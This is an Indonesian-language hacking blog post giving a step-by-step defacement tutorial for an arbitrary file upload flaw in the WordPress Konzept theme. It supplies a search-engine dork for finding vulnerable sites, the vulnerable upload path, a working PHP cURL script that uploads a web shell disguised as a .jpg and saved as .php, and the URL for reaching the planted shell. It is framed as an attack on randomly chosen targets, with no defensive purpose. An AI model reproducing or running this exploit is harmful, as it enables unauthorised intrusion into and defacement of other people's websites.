Deface Menggunakan WordPress Theme Konzept Arbitrary File Upload Vulnerability

 

 Kali ini gua mau share Cara Deface Menggunakan WordPress Theme Konzept Arbitrary File Upload Vulnerability

 

 

Dork : 

 

inurl:/wp-content/themes/konzept/

1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit:  

/wp-content/themes/konzept/includes/uploadify/upload.php

3. Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

Kurang lebihnya sih gituh :v

4. Buat File Baru Berekstensi .php Contoh konzept.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn konzept.php tadi
*btw disini shell ente, ubah dulu ekstensinya jadi .JPG

<?php

$url = "http://127.0.0.1"; // put URL Here
$post = array
(
        "file" => "@namashell.jpg",
        "name" => "namashell.php"
);

$ch = curl_init ("www.target.co.li/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

echo $data;


?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD,dan akan terlihat seperti di SS.

8. Shell Akses: www.target.coli/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php



Semoga Bermanfaat


Sumber : TKJ Cyber Art